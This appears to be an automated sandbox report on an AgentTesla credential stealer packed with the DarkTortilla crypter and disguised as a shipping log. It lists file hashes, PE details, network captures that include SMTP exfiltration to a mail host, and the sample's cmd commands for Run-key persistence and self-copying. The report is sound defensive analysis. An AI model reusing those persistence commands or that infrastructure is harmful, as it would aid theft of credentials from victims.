Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\newfile\newfile.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	42064
Entropy (8bit):	6.19564898727408
Encrypted:	false
SSDEEP:	384:qtpFVLK0MsihB9VKS7xdgl6KJ9Yl6dnPU3SERztmbqCJstdMardz/JikPZ+RPZTg:GBMs2SqdSZ6Iq8BxTfqWR8h7ukP
MD5:	5D4073B2EB6D217C19F2B22F21BF8D57
SHA1:	F0209900FBF08D004B886A0B3BA33EA2B0BF9DA8
SHA-256:	AC1A3F21FCC88F9CEE7BF51581EAFBA24CC76C924F0821DEB2AFDF1080DDF3D3
SHA-512:	9AC94880684933BA3407CDC135ABC3047543436567AF14CD9269C4ADC5A6535DB7B867D6DE0D6238A21B94E69F9890DBB5739155871A624520623A7E56872159
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: proforma 8133197 of 1007332009.pdf.exe, Detection: malicious, Browse Filename: RFQ-120324_pdf.exe, Detection: malicious, Browse Filename: POs#U034fx#U034fl#U034fx#U034f..exe, Detection: malicious, Browse Filename: New Orders#U034fx#U034fl#U034fx#U034f..exe, Detection: malicious, Browse Filename: #U00d6deme Onay#U0131 Kopyas#U0131.exe, Detection: malicious, Browse Filename: r__demeOnay__Kopyas__.exe, Detection: malicious, Browse Filename: odeme_kopyasi.exe, Detection: malicious, Browse Filename: O7HM6KX2ce.exe, Detection: malicious, Browse Filename: CBD_USD_REFERENCE_3901828872899399391108390100110929111.exe, Detection: malicious, Browse Filename: passportscan.hta, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...,>.]..............0..T...........r... ........@.. ....................................`.................................4r..O....................b..PB...........p............................................... ............... ..H............text....R... ...T.................. ..`.rsrc................V..............@..@.reloc...............`..............@..B................hr......H........"..\|J..........lm.......o......................................2~.....o.....r...p(....VrK..p(....s...........0..........(....(....o....o....(....o.... .....T(....o....(....o....o ...o!....4(....o....(....o....o ...o".....(....rm..ps#...o....($........(%....o&....ry..p......%.r...p.%.(.....(....('....((.......o)...('........................."..(.....{Q...-...}Q.....(+...(....(,....(+..."..(-.....(......(.....r...p.(/...o0...s....}T...*....0.. .......~S...-.s

\Device\ConDrv

Download File

Process:	C:\Users\user\AppData\Roaming\newfile\newfile.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2017
Entropy (8bit):	4.659840607039457
Encrypted:	false
SSDEEP:	48:zK4QsD4ql0+1AcJRy0EJP64gFljVlWo3ggxUnQK2qmBvgw1+5:zKgDEcTytNe3Wo3uQVBIe+5
MD5:	3BF802DEB390033F9A89736CBA5BFAFF
SHA1:	25A7177A92E0283B99C85538C4754A12AC8AD197
SHA-256:	5202EB464D6118AC60F72E89FBAAACF1FB8CF6A232F98F47F88D0E7B2F3AFDB3
SHA-512:	EB4F440D28ECD5834FD347F43D4828CA9FEE900FF003764DD1D18B95E0B84E414EAECF70D75236A1463366A189BC5CBA21613F79B5707BF7BDB3CEA312CCE4F7
Malicious:	false
Preview:	Microsoft (R) .NET Framework Installation utility Version 4.8.4084.0..Copyright (C) Microsoft Corporation. All rights reserved.....Usage: InstallUtil [/u \| /uninstall] [option [...]] assembly [[option [...]] assembly] [...]]....InstallUtil executes the installers in each given assembly...If the /u or /uninstall switch is specified, it uninstalls..the assemblies, otherwise it installs them. Unlike other..options, /u applies to all assemblies, regardless of where it..appears on the command line.....Installation is done in a transactioned way: If one of the..assemblies fails to install, the installations of all other..assemblies are rolled back. Uninstall is not transactioned.....Options take the form /switch=[value]. Any option that occurs..before the name of an assembly will apply to that assembly's..installation. Options are cumulative but overridable - options..specified for one assembly will apply to the next as well unless..the option is specified with a new value. The default for

\Device\Null

Download File

Process:	C:\Windows\SysWOW64\PING.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2146
Entropy (8bit):	4.734488294573264
Encrypted:	false
SSDEEP:	12:PKMRJpTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeT9:/8yaAokItULVDv
MD5:	AE5D2D3F84E5EBAF0480FC1240D814AB
SHA1:	56577E8764416CCBBD8152D3FF39932DA8E11DC5
SHA-256:	2AC992B148A58899EC006312186E6A2BA761B49E40C6993E31ED04F05AEE6587
SHA-512:	8314CECD54DDDC11828D9880C445B677093B36E1DFE43C9E92188C66254842CCE70D1F9B13A6FD98F05ACAB95B1BE6EF036405667C0E055EED0D38C76792761C
Malicious:	false
Preview:	..Pinging 127.0.0.1 with 32 bytes of data:..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: byt

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.433026934770898
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe
File size:	988'672 bytes
MD5:	3ff8dae4fea5ddd0d045af07d3ce8016
SHA1:	e15f1b3c589dc0ec3c9de7f501a259b73ce62482
SHA256:	f1c0ff1f0bc852d09a15805af1bd83a32eabf5b5412a9b43053ecfb8cb03250b
SHA512:	72563cf8eb2bb294b5a7f457298225d3c4ca2283cba4911ddbe6f6afa0deb2a9a856f30491e638be86c8da36b4075c5cdc7e54b97eccd7aaffb6875d18655399
SSDEEP:	12288:gSBcpm64v7Zh6PsSUkynkGZe2uIgAKpZR0uC9EqZnEMs1Ts2Q0kdCDbjq/GrrzCg:gSyj4v7KPsbkrDjIWR0uuLs1RJ
TLSH:	5D253996E3DD6C80F1BE6B742537A05087B378DADA39EA0D188D77DD2BB36406590332
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\..&............................./... ...@....@.. ....................................`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4f2fee
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x26D3835C [Thu Aug 23 07:18:52 1990 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xf2f94	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xf4000	0x10	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xf6000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xf0ff4	0xf1000	9db9613de73d953a5d84d55e6e84040b	False	0.5547746207209544	data	6.439040315983852	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xf4000	0x10	0x200	4e3b2ec5da7200456d338156d854c01b	False	0.033203125	data	0.020393135236084953	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xf6000	0xc	0x200	c40a8c4b6463314dcdf6c92c196ec2dd	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
mscoree.dll	_CorExeMain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 29, 2024 15:05:06.259507895 CET	49742	80	192.168.2.4	208.95.112.1
Mar 29, 2024 15:05:06.355094910 CET	80	49742	208.95.112.1	192.168.2.4
Mar 29, 2024 15:05:06.355174065 CET	49742	80	192.168.2.4	208.95.112.1
Mar 29, 2024 15:05:06.356858969 CET	49742	80	192.168.2.4	208.95.112.1
Mar 29, 2024 15:05:06.457696915 CET	80	49742	208.95.112.1	192.168.2.4
Mar 29, 2024 15:05:06.508058071 CET	49742	80	192.168.2.4	208.95.112.1
Mar 29, 2024 15:05:07.547544003 CET	49743	26	192.168.2.4	158.106.134.182
Mar 29, 2024 15:05:07.658595085 CET	26	49743	158.106.134.182	192.168.2.4
Mar 29, 2024 15:05:07.658684969 CET	49743	26	192.168.2.4	158.106.134.182
Mar 29, 2024 15:05:07.822248936 CET	26	49743	158.106.134.182	192.168.2.4
Mar 29, 2024 15:05:07.829937935 CET	49743	26	192.168.2.4	158.106.134.182
Mar 29, 2024 15:05:07.943823099 CET	26	49743	158.106.134.182	192.168.2.4
Mar 29, 2024 15:05:07.944505930 CET	49743	26	192.168.2.4	158.106.134.182
Mar 29, 2024 15:05:08.063029051 CET	26	49743	158.106.134.182	192.168.2.4
Mar 29, 2024 15:05:08.069974899 CET	49743	26	192.168.2.4	158.106.134.182
Mar 29, 2024 15:05:08.191946983 CET	26	49743	158.106.134.182	192.168.2.4
Mar 29, 2024 15:05:08.191973925 CET	26	49743	158.106.134.182	192.168.2.4
Mar 29, 2024 15:05:08.191987991 CET	26	49743	158.106.134.182	192.168.2.4
Mar 29, 2024 15:05:08.192002058 CET	26	49743	158.106.134.182	192.168.2.4
Mar 29, 2024 15:05:08.192029953 CET	49743	26	192.168.2.4	158.106.134.182
Mar 29, 2024 15:05:08.192074060 CET	49743	26	192.168.2.4	158.106.134.182
Mar 29, 2024 15:05:08.193589926 CET	26	49743	158.106.134.182	192.168.2.4
Mar 29, 2024 15:05:08.209939957 CET	49743	26	192.168.2.4	158.106.134.182
Mar 29, 2024 15:05:08.321923018 CET	26	49743	158.106.134.182	192.168.2.4
Mar 29, 2024 15:05:08.337502003 CET	49743	26	192.168.2.4	158.106.134.182
Mar 29, 2024 15:05:08.449204922 CET	26	49743	158.106.134.182	192.168.2.4
Mar 29, 2024 15:05:08.454113007 CET	49743	26	192.168.2.4	158.106.134.182
Mar 29, 2024 15:05:08.566088915 CET	26	49743	158.106.134.182	192.168.2.4
Mar 29, 2024 15:05:08.566458941 CET	49743	26	192.168.2.4	158.106.134.182
Mar 29, 2024 15:05:08.718305111 CET	26	49743	158.106.134.182	192.168.2.4
Mar 29, 2024 15:05:10.219753027 CET	26	49743	158.106.134.182	192.168.2.4
Mar 29, 2024 15:05:10.220244884 CET	49743	26	192.168.2.4	158.106.134.182
Mar 29, 2024 15:05:10.332374096 CET	26	49743	158.106.134.182	192.168.2.4
Mar 29, 2024 15:05:10.332393885 CET	26	49743	158.106.134.182	192.168.2.4
Mar 29, 2024 15:05:10.334029913 CET	26	49743	158.106.134.182	192.168.2.4
Mar 29, 2024 15:05:10.334104061 CET	49743	26	192.168.2.4	158.106.134.182
Mar 29, 2024 15:05:10.341526031 CET	49743	26	192.168.2.4	158.106.134.182
Mar 29, 2024 15:05:10.453349113 CET	26	49743	158.106.134.182	192.168.2.4
Mar 29, 2024 15:05:57.102456093 CET	49742	80	192.168.2.4	208.95.112.1
Mar 29, 2024 15:05:57.199469090 CET	80	49742	208.95.112.1	192.168.2.4
Mar 29, 2024 15:05:57.199629068 CET	49742	80	192.168.2.4	208.95.112.1

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 29, 2024 15:05:06.155987024 CET	50329	53	192.168.2.4	1.1.1.1
Mar 29, 2024 15:05:06.253552914 CET	53	50329	1.1.1.1	192.168.2.4
Mar 29, 2024 15:05:07.101634979 CET	57325	53	192.168.2.4	1.1.1.1
Mar 29, 2024 15:05:07.545660019 CET	53	57325	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 29, 2024 15:05:06.155987024 CET	192.168.2.4	1.1.1.1	0x9920	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Mar 29, 2024 15:05:07.101634979 CET	192.168.2.4	1.1.1.1	0x8c4d	Standard query (0)	mail.crediperu.pe	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 29, 2024 15:05:06.253552914 CET	1.1.1.1	192.168.2.4	0x9920	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Mar 29, 2024 15:05:07.545660019 CET	1.1.1.1	192.168.2.4	0x8c4d	No error (0)	mail.crediperu.pe	crediperu.pe		CNAME (Canonical name)	IN (0x0001)	false
Mar 29, 2024 15:05:07.545660019 CET	1.1.1.1	192.168.2.4	0x8c4d	No error (0)	crediperu.pe		158.106.134.182	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49742	208.95.112.1	80	7608	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Mar 29, 2024 15:05:06.356858969 CET	80	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Mar 29, 2024 15:05:06.457696915 CET	175	IN	HTTP/1.1 200 OK Date: Fri, 29 Mar 2024 14:05:05 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 6 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 66 61 6c 73 65 0a Data Ascii: false

Analysis Process: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exePID: 7336, Parent PID: 2580

General

Target ID:	0
Start time:	15:01:56
Start date:	29/03/2024
Path:	C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe"
Imagebase:	0xa60000
File size:	988'672 bytes
MD5 hash:	3FF8DAE4FEA5DDD0D045AF07D3CE8016
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2044932954.000000000388E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2046079068.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2044074140.0000000002774000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2044932954.00000000037B4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2044932954.00000000037B4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2044932954.00000000037B4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2044074140.0000000002681000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2044932954.0000000003689000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2044932954.0000000003689000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2044932954.0000000003689000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	15:02:03
Start date:	29/03/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd" /c ping 127.0.0.1 -n 37 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "program" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	15:02:03
Start date:	29/03/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	15:02:03
Start date:	29/03/2024
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping 127.0.0.1 -n 37
Imagebase:	0x840000
File size:	18'944 bytes
MD5 hash:	B3624DD758CCECF93A1226CEF252CA12
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	15:02:33
Start date:	29/03/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd" /c ping 127.0.0.1 -n 39 > nul && copy "C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe" && ping 127.0.0.1 -n 39 > nul && "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	15:02:33
Start date:	29/03/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	15:02:33
Start date:	29/03/2024
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping 127.0.0.1 -n 39
Imagebase:	0x840000
File size:	18'944 bytes
MD5 hash:	B3624DD758CCECF93A1226CEF252CA12
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	15:02:41
Start date:	29/03/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "program" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe"
Imagebase:	0x260000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	15:03:12
Start date:	29/03/2024
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping 127.0.0.1 -n 39
Imagebase:	0x840000
File size:	18'944 bytes
MD5 hash:	B3624DD758CCECF93A1226CEF252CA12
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	15:03:50
Start date:	29/03/2024
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe"
Imagebase:	0x350000
File size:	988'672 bytes
MD5 hash:	3FF8DAE4FEA5DDD0D045AF07D3CE8016
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 0000000E.00000002.3568807416.0000000003FF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 0000000E.00000002.3568807416.00000000040E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 0000000E.00000002.3568807416.000000000402C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 0000000E.00000002.3558267048.000000000305B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.3568807416.000000000411C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.3568807416.000000000411C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 0000000E.00000002.3558267048.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 61%, ReversingLabs Detection: 65%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	15:04:29
Start date:	29/03/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0x3e0000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.3230473196.00000000007B2000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.3230473196.00000000007B2000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	15:04:32
Start date:	29/03/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0xf90000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.4151678724.0000000003321000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.4151678724.0000000003321000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.4151678724.000000000334E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	18
Start time:	15:05:17
Start date:	29/03/2024
Path:	C:\Users\user\AppData\Roaming\newfile\newfile.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\newfile\newfile.exe"
Imagebase:	0x360000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs Detection: 0%, Virustotal, Browse
Reputation:	moderate
Has exited:	true

